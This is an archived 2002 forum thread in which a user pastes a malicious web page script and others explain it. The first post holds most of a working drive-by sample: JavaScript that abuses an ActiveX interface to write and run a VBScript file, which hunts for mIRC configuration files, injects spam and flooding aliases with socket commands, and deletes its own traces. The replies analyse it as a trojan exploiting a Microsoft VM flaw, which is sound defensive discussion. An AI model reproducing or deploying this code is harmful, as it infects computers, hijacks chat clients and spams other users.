Closed Thread Icon

Preserved Topic: Guess What ? (JavaScript, VBScript, mIRC socket Scripting) ? Pages that link to <a href="https://ozoneasylum.com/backlink?for=18475" title="Pages that link to Preserved Topic: Guess What ? (JavaScript, VBScript, mIRC socket Scripting) ?" rel="nofollow" >Preserved Topic: Guess What ? (JavaScript, VBScript, mIRC socket Scripting) ?\

 
Author Thread
sunsuron
Obsessive-Compulsive (I) Inmate

From: Cyberajaya, Kuala Lumpur, Malaysia
Insane since: Jul 2002

posted posted 08-13-2002 08:22

What the hack is This!?


<script language="JAVASCRIPT">
<!-- hide for safe browsers
InterfaceObject=document.applets[0];
setTimeout("Upload()",1000);
function Upload() {
fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
InterfaceObject.setCLSID(fsoClassID);
fso = InterfaceObject.createInstance();
// windir = fso.getspecialfolder(0);
filename = "\\rol.vbs";
file = fso.opentextfile(filename, "2", "TRUE");
file.writeline(filecontent1)
file.writeline(filecontent2)
file.writeline(filecontent3)
file.writeline(filecontent4)
file.writeline(filecontent5)
file.writeline(filecontent6)
file.writeline(filecontent7)
file.writeline(filecontent8)
file.writeline(filecontent9)
file.writeline(filecontent10)
file.writeline(filecontent11)
file.writeline(filecontent12)
file.writeline(filecontent13)
file.writeline(filecontent14)
file.writeline(filecontent15)
file.writeline(filecontent16)
file.writeline(filecontent17)
file.writeline(filecontent18)
file.writeline(filecontent19)
file.writeline(filecontent20)
file.writeline(filecontent21)
file.writeline(filecontent22)
file.writeline(filecontent23)
file.writeline(filecontent24)
file.writeline(filecontent25)
file.writeline(filecontent26)
file.writeline(filecontent27)
file.writeline(filecontent28)
file.writeline(filecontent29)
file.writeline(filecontent30)
file.writeline(filecontent31)
file.writeline(filecontent32)
file.writeline(filecontent33)
file.writeline(filecontent34)
file.writeline(filecontent35)
file.writeline(filecontent36)
file.writeline(filecontent37)
file.writeline(filecontent38)
file.writeline(filecontent39)
file.writeline(filecontent40)
file.writeline(filecontent41)
file.writeline(filecontent42)
file.writeline(filecontent43)
file.writeline(filecontent44)
file.writeline(filecontent45)
file.writeline(filecontent46)
file.writeline(filecontent47)
file.writeline(filecontent48)
file.writeline(filecontent49)
file.writeline(filecontent50)
file.writeline(filecontent51)
file.writeline(filecontent52)
file.writeline(filecontent53)
file.writeline(filecontent54)
file.writeline(filecontent55)
file.writeline(filecontent56)
file.writeline(filecontent57)
file.writeline(filecontent58)
file.writeline(filecontent59)
file.writeline(filecontent60)
file.writeline(filecontent61)
file.writeline(filecontent62)
file.writeline(filecontent63)
file.writeline(filecontent64)
file.writeline(filecontent65)
file.writeline(filecontent66)
file.writeline(filecontent67)
file.writeline(filecontent68)
file.writeline(filecontent69)
file.writeline(filecontent70)
file.writeline(filecontent71)
file.writeline(filecontent72)
file.writeline(filecontent73)
file.writeline(filecontent74)
file.writeline(filecontent75)
file.writeline(filecontent76)
file.writeline(filecontent77)
file.writeline(filecontent78)
file.writeline(filecontent79)
file.writeline(filecontent80)
file.writeline(filecontent81)
file.writeline(filecontent82)
file.writeline(filecontent83)
file.writeline(filecontent84)
file.writeline(filecontent85)
file.writeline(filecontent86)
file.writeline(filecontent87)
file.writeline(filecontent88)
file.writeline(filecontent89)
file.writeline(filecontent90)
file.writeline(filecontent91)
file.writeline(filecontent92)
file.writeline(filecontent93)
file.writeline(filecontent94)
file.writeline(filecontent95)
file.writeline(filecontent96)
file.writeline(filecontent97)
file.writeline(filecontent98)
file.writeline(filecontent99)
file.writeline(filecontent100)
file.writeline(filecontent101)
file.writeline(filecontent102)
file.writeline(filecontent103)
file.writeline(filecontent104)
file.writeline(filecontent105)
file.writeline(filecontent106)
file.writeline(filecontent107)
file.writeline(filecontent108)
file.writeline(filecontent109)
file.writeline(filecontent110)
file.writeline(filecontent111)
file.writeline(filecontent112)
file.writeline(filecontent113)
file.writeline(filecontent114)
file.writeline(filecontent115)
file.writeline(filecontent116)
file.writeline(filecontent117)
file.writeline(filecontent118)
file.writeline(filecontent119)
file.writeline(filecontent120)
file.writeline(filecontent121)
file.writeline(filecontent122)
file.writeline(filecontent123)
file.writeline(filecontent124)
file.writeline(filecontent125)
file.writeline(filecontent126)
file.writeline(filecontent127)
file.writeline(filecontent128)
file.writeline(filecontent129)
file.writeline(filecontent130)
file.writeline(filecontent131)
file.writeline(filecontent132)
file.writeline(filecontent133)
file.writeline(filecontent134)
file.writeline(filecontent135)
file.writeline(filecontent136)
file.writeline(filecontent137)
file.writeline(filecontent138)
file.writeline(filecontent139)
file.writeline(filecontent140)
file.writeline(filecontent141)
file.writeline(filecontent142)
file.writeline(filecontent143)
file.writeline(filecontent144)
file.writeline(filecontent145)
file.writeline(filecontent146)
file.writeline(filecontent147)
file.writeline(filecontent148)
file.writeline(filecontent149)
file.writeline(filecontent150)
file.writeline(filecontent151)
file.writeline(filecontent152)
file.writeline(filecontent153)
file.writeline(filecontent154)
file.writeline(filecontent155)
file.writeline(filecontent156)
file.writeline(filecontent157)
file.writeline(filecontent158)
file.writeline(filecontent159)
file.writeline(filecontent160)
file.writeline(filecontent161)
file.writeline(filecontent162)
file.writeline(filecontent163)
file.writeline(filecontent164)
file.writeline(filecontent165)
file.writeline(filecontent166)
file.writeline(filecontent167)
file.writeline(filecontent168)
file.writeline(filecontent169)
file.writeline(filecontent170)
file.writeline(filecontent171)
file.writeline(filecontent172)
file.writeline(filecontent173)
file.writeline(filecontent174)
file.writeline(filecontent175)
file.writeline(filecontent176)
file.writeline(filecontent177)
file.writeline(filecontent178)
file.writeline(filecontent179)
file.writeline(filecontent180)
file.writeline(filecontent181)
file.writeline(filecontent182)
file.writeline(filecontent183)
file.writeline(filecontent184)
file.writeline(filecontent185)
file.writeline(filecontent186)
file.writeline(filecontent187)
file.writeline(filecontent188)
file.writeline(filecontent189)
file.writeline(filecontent190)
file.writeline(filecontent191)
file.writeline(filecontent192)
file.writeline(filecontent193)
file.writeline(filecontent194)
file.writeline(filecontent195)
file.writeline(filecontent196)
file.writeline(filecontent197)
file.writeline(filecontent198)
file.writeline(filecontent199)
file.writeline(filecontent200)
file.writeline(filecontent201)
file.writeline(filecontent202)
file.writeline(filecontent203)
file.writeline(filecontent204)
file.writeline(filecontent205)
file.writeline(filecontent206)
file.writeline(filecontent207)
file.writeline(filecontent208)
file.writeline(filecontent209)
file.writeline(filecontent210)
file.writeline(filecontent211)
file.writeline(filecontent212)
file.writeline(filecontent213)
file.writeline(filecontent214)
file.writeline(filecontent215)
file.writeline(filecontent216)
file.writeline(filecontent217)
file.writeline(filecontent218)
file.writeline(filecontent219)
file.writeline(filecontent220)
file.writeline(filecontent221)
file.writeline(filecontent222)
file.writeline(filecontent223)
file.writeline(filecontent224)
file.writeline(filecontent225)
file.writeline(filecontent226)
file.writeline(filecontent227)
file.writeline(filecontent228)
file.writeline(filecontent229)
file.writeline(filecontent230)
file.writeline(filecontent231)
file.writeline(filecontent232)
file.writeline(filecontent233)
file.writeline(filecontent234)
file.writeline(filecontent235)
file.writeline(filecontent236)
file.writeline(filecontent237)
file.writeline(filecontent238)
file.writeline(filecontent239)
file.writeline(filecontent240)
file.writeline(filecontent241)
file.writeline(filecontent242)
file.writeline(filecontent243)
file.writeline(filecontent244)
file.writeline(filecontent245)
file.writeline(filecontent246)
file.writeline(filecontent247)
file.writeline(filecontent248)
file.writeline(filecontent249)
file.writeline(filecontent250)
file.writeline(filecontent251)
file.writeline(filecontent252)
file.writeline(filecontent253)
file.writeline(filecontent254)
file.writeline(filecontent255)
file.writeline(filecontent256)
file.writeline(filecontent257)
file.writeline(filecontent258)
file.writeline(filecontent259)
file.writeline(filecontent260)
file.writeline(filecontent261)
file.writeline(filecontent262)
file.writeline(filecontent263)
file.writeline(filecontent264)
file.writeline(filecontent265)
file.writeline(filecontent266)
file.writeline(filecontent267)
file.writeline(filecontent268)
file.writeline(filecontent269)
file.close();
Run();
}

function Run() {

WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
InterfaceObject.setCLSID(WshShellClassID);
wshShell = InterfaceObject.createInstance();
wshShell.run(filename,"6","TRUE"); }
-->
</script>
<script language="vbscript">
a=chr(34)
filecontent1="dim Otag "
filecontent2="dim AOtag"
filecontent3="dim Ttag "
filecontent4="dim DummyTag"
filecontent5="dim SectionDef"
filecontent6="call ShowFolderList("&a&"c:\"&a&")"
filecontent269="call ShowFolderList("&a&"d:\"&a&")"
filecontent7="sub ShowFolderList(s)"
filecontent8="on error resume next"
filecontent9="Set filesys = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent10="Set RootFolder1 = FileSys.GetFolder(s)"
filecontent11="Set SubFolds1 = RootFolder1.subfolders"
filecontent12="For Each f1 in Subfolds1"
filecontent13="s = f1.path & "&a&"\"&a&""
filecontent14="Otag = s & "&a&"mirc.ini"&a&""
filecontent15="AOtag= s & "&a&"mirc.dat"&a&""
filecontent16="DummyTag= "&a&"C:\winamod.dat"&a&""
filecontent17="TTag= s & "&a&"server.ini"&a&""
filecontent18="SectionDef= "&a&"[rfiles]"&a&""
filecontent19="if filesys.fileexists(otag) then "
filecontent20="Call Filemod() "
filecontent21="filesys.CopyFile DummyTag, Otag, true"
filecontent22="Call ImplementRemote()"
filecontent23="filesys.CopyFile DummyTag, Otag, true"
filecontent24="Call ImplementWarn()"
filecontent25="filesys.CopyFile DummyTag, Otag, true"
filecontent26="Call ImplementFserv()"
filecontent27="filesys.CopyFile DummyTag, Otag, true"
filecontent28="call ImplementPerfCheck()"
filecontent29="filesys.CopyFile DummyTag, Otag, true"
filecontent30="Call ImplementPerform()"
filecontent31="SetClearArchiveBit(Otag)"
filecontent32="End If"
filecontent33="Call ShowFolderList(s)"
filecontent34="Next"
filecontent35="End sub"
filecontent36="Function FiltNum(FilString)"
filecontent37="on error resume next"
filecontent38="countdown=5"
filecontent39="do"
filecontent40="Comp = mid(FilString,2,countdown)"
filecontent41="if isnumeric(Comp) then LastNum = Comp : exit do"
filecontent42="countdown=countdown-1"
filecontent43="loop until countdown =0"
filecontent44="FiltNum = LastNum"
filecontent45="end function"
filecontent46="Function LastLineNum(SSection)"
filecontent47="on error resume next"
filecontent48="Set FS1N = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent49="Set FR1N = FS1N.OpenTextFile(otag,1,true)"
filecontent50="Do While FR1N.AtEndOfStream <> True"
filecontent51="segment1 = FR1N.readline"
filecontent52="w = InstrRev(segment1,SSection)"
filecontent53="counts=counts+1"
filecontent54="if w > 0 then "
filecontent55="do"
filecontent56="if FR1N.AtEndOfStream = True then exit do"
filecontent57="segmentk = FR1N.readline"
filecontent58="k = InstrRev(segmentk,"&a&"n"&a&",1) "
filecontent59="if k=1 then"
filecontent60="LastNum=FiltNum(segmentk)"
filecontent61="end if"
filecontent62="Loop until k=0"
filecontent63="end if"
filecontent64="loop"
filecontent65="FR1N.Close"
filecontent66="LastLineNum=LastNum"
filecontent67="end function"
filecontent68="Function Filemod()"
filecontent69="on error resume next"
filecontent70="Set fs1 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent71="Set fr1 = fs1.OpenTextFile(otag,1,true)"
filecontent72="Set fs2 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent73="Set fr2 = fs2.OpenTextFile(DummyTag,2,true)"
filecontent74="Do While fr1.AtEndOfStream <> True"
filecontent75="segment1 = fr1.readline"
filecontent76="fr2.writeline segment1"
filecontent77="w = InstrRev(segment1,"&a&"[rfiles]"&a&")"
filecontent78="counts=counts+1"
filecontent79="if w > 0 then "
filecontent80="counts2=counts"
filecontent81="do"
filecontent82="if fr1.AtEndOfStream = True then exit do"
filecontent83="segmentk = fr1.readline"
filecontent84="k = InstrRev(segmentk,"&a&"n"&a&",1) "
filecontent85="if k=1 then"
filecontent86="LastNum=FiltNum(segmentk)"
filecontent87="fr2.writeline segmentk"
filecontent88="end if"
filecontent89="COUNTS2=COUNTS2+1"
filecontent90="Loop until k<>1"
filecontent91="exit do"
filecontent92="end if"
filecontent93="loop"
filecontent94="fr1.Close"
filecontent95="fr2.close"
filecontent96="Set fs3 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent97="Set fr3 = fs3.OpenTextFile(DummyTag,8,true)"
filecontent98="TrojanInfo = "&a&"n"&a&" & lastlinenum(SectionDef)+1 & "&a&"=server.ini"&a&""
filecontent99="fr3.writeline TrojanInfo"
filecontent100="fr3.Close"
filecontent101="Set fs4 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent102="Set fr4 = fs4.OpenTextFile(Otag,1,true)"
filecontent103="Set fs5 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent104="Set fr5 = fs5.OpenTextFile(DummyTag,8,true)"
filecontent105="Do While fr4.AtEndOfStream <> True"
filecontent106="segment2 = fr4.readline"
filecontent107="if fr4.line >= counts2 + 2 then "
filecontent108="fr5.writeline segment2"
filecontent109="end if"
filecontent110="loop"
filecontent111="fr4.Close"
filecontent112="fr5.Close"
filecontent113="fs5.CopyFile DummyTag, Otag, true"
filecontent114="Call FLDL(TTag)"
filecontent115="end Function"
filecontent116="sub FLDL(TTag)"
filecontent117="on error resume next"
filecontent118="Set fs6 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent119="Set fr6 = fs6.OpenTextFile(TTag,2,true)"
filecontent120="fr6.writeline "&a&"[script]"&a&""
filecontent121="fr6.writeline "&a&"n0=on 1:join:#:/msg $nick %invite"&a&""
filecontent122="fr6.writeline "&a&"n1=on 1 art:#:/msg $nick %invite"&a&""
filecontent123="fr6.writeline "&a&"n2="&a&""
filecontent124="fr6.writeline "&a&"n3="&a&""
filecontent125="fr6.writeline "&a&"n4="&a&""
filecontent126="fr6.writeline "&a&"n5="&a&""
filecontent127="fr6.writeline "&a&"n6="&a&""
filecontent128="fr6.writeline "&a&"n7="&a&""
filecontent129="fr6.writeline "&a&"n8="&a&""
filecontent130="fr6.writeline "&a&"n9="&a&""
filecontent131="fr6.writeline "&a&"n10=alias packt { .sockwrite -n $sockname privmsg $CHR(35) $+ $CHR(169) : $+ .Now. [.Packeting.] $1 [.with.] $2 [.bytes.] $3 [.times.]

Bugimus
Maniac (V) Mad Scientist

From: New California
Insane since: Mar 2000

posted posted 08-13-2002 08:59

I really don't know how to answer you. What exactly do you want to know about all that code?

. . : slicePuzzle

sunsuron
Obsessive-Compulsive (I) Inmate

From: Cyberajaya, Kuala Lumpur, Malaysia
Insane since: Jul 2002

posted posted 08-13-2002 10:12

What do you know ?

poi
Paranoid (IV) Inmate

From: France
Insane since: Jun 2002

posted posted 08-13-2002 13:11

This huge mess is a javascript that instanciate an ActiveX which creates a file called rol.vbs at the root of you harddrive ( there's even a commented line that seeked the windows directory )
then run rol.vbs.

rol.vbs seems to search you mirc.ini and mirc.dat files on your harddrive, then update them to add some aliases to create/control some bot who will either flood or invite a dude to a porn site ( which seems to have the same kind of malicious script )
Another important point, I've seen some socket instructions in the aliases.

Well, this script a huge SHIT! but on a coder's point, it's interresting to see it

Mathieu "POÏ" HENRI

sunsuron
Obsessive-Compulsive (I) Inmate

From: Cyberajaya, Kuala Lumpur, Malaysia
Insane since: Jul 2002

posted posted 08-13-2002 15:01

I cannot agree more...
Thanks for that simple, fast explaination poi.

poi
Paranoid (IV) Inmate

From: France
Insane since: Jun 2002

posted posted 08-13-2002 16:32

you're welcome.
I don't know VBscript, so I'm not 100% sure of the exact behaviour of this script, but I'm sure I wouldn't appreciate to have that kind of script running on my computer.

With a simple search in google, I found a code in the same vein that can write anything in the Windows Registry. This script ( and the one I found ) exploits a vulnerability of Microsoft VM ActiveX Component.
I also found a script than simply create an EXE file and run it. Scary!

Could you tell us where you got this script ?
Thanks.



Mathieu "POÏ" HENRI

CPrompt
Maniac (V) Inmate

From: there...no..there.....
Insane since: May 2001

posted posted 08-13-2002 16:42

Well that doesn't look good!

These lines:

quote:
filecontent266="set sss=createobject("&a&"scripting.filesystemobject"&a&")"
filecontent267="sss.DeleteFile "&a&"c:\rol.vbs"&a&""
filecontent268="sss.DeleteFile "&a&"c:\winamod.dat"&a&""



Looks like it creates a file and then deletes it! Scary stuff!

Later,
C:\


~Binary is best~

Bugimus
Maniac (V) Mad Scientist

From: New California
Insane since: Mar 2000

posted posted 08-13-2002 23:39

Yes, now I really want to know how and where you got this code too.

Petskull
Maniac (V) Mad Scientist

From: 127 Halcyon Road, Marenia, Atlantis
Insane since: Aug 2000

posted posted 08-14-2002 05:27

check this out: http://galeon.hispavista.com/hack-spain/codigo.txt

that's what this google serach yielded... there was more, but I didn't particularly feel like poking my head in a bunch of websites and yelling "ARE YOU THE PAGE THAT CAN KILL MY COMPUTER?"...

you know, there used to be this myth of a 'poisoned page' out there (A Black Widow page, I believe it was called) that could fuck with your computer- it was dismissed as an urban legend with no possibility of actually occuring...

....they laughed at the captain crunch box, too.....


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

sunsuron
Obsessive-Compulsive (I) Inmate

From: Cyberajaya, Kuala Lumpur, Malaysia
Insane since: Jul 2002

posted posted 08-14-2002 10:29

I really don't remember where did the last time I've encountered this script but most probably, I'm one of the victim of this code, while executing my mirc.exe (I'm a die hard fan of mIRC scripting ), I begin experienced
being kicked often from channels. After several times figuring out, I came to know that I 've been mass-advertising in private message (from the codes) with auto-greet on join channel. Porno url. Mmm... That's pretty interesting Is this sort of backdoor ?

« BackwardsOnwards »

Show Forum Drop Down Menu